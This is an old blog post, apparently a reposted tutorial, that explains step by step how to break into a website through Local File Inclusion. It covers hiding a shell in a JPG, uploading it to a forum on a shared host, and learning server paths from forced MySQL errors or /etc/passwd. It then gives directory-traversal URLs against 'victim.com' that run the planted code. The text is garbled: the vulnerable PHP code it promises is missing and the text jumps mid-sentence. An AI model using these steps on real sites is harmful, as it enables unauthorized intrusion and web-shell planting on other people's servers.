Receive Daily Updates

Enter your email address:

Wednesday, August 31, 2011

Step by Step guide for LFI (Local File Inclusion): The process of exploiting a website

This tutorial will guide you into the process of exploiting a website thru the LFI (Local File Inclusion). First lets take a look at a php code that is vulnerable to LFI: PHP Code:program (all you need to do is right click on the image, open with..., then select the edjpgcom program and then just type the code). Ok now that you have your shell in the image all you need to do is upload it! If your victim.com has a forum or something else that allows you to upload great, if not check if its in a shared hosting, if so do a reverse lookup on it!

Now that you have a list of potential sites that may have a forum or something else that allows you to upload your image all you need to do is take some time to browse thru them until you find one!

After you found one and have uploaded your image here is tricky part, you'll need to "create" an error on it (in order to find the server path to it)! Try per example create an mysql error and you will get something like this:

Quote: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sitefolder/public_html/includes/view.php on line 37 If you can't force an error go back to the etc/passwd file:

Quote: username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh As you can see the username is also the directory name, most of the times the name is similar to the domain name, but if not the case you'll have to try them until you find the one you're looking for!

Go to your avatar image right click on it and then properties (write down the path to it), you'll now all set up. In your browser type this (again, the nr of ../ may vary):

Quote: victim.com/index.php=../../../../../../../../../home/the_other_site_dir/public_html/path_to_your_avatar/avatar.jpg In order "words" should look like this (using fictitious "names"):

Quote: victim.com/index.php=../../../../../../../../../home/arcfull/public_html/forum/uploads/avatar.jpg After you type this you will see the result of the code inserted in the image!

SOURCE: PINOY SECURITY

1 Visitor Reactions & Comments:

Berbaki said...

how to get this /test.php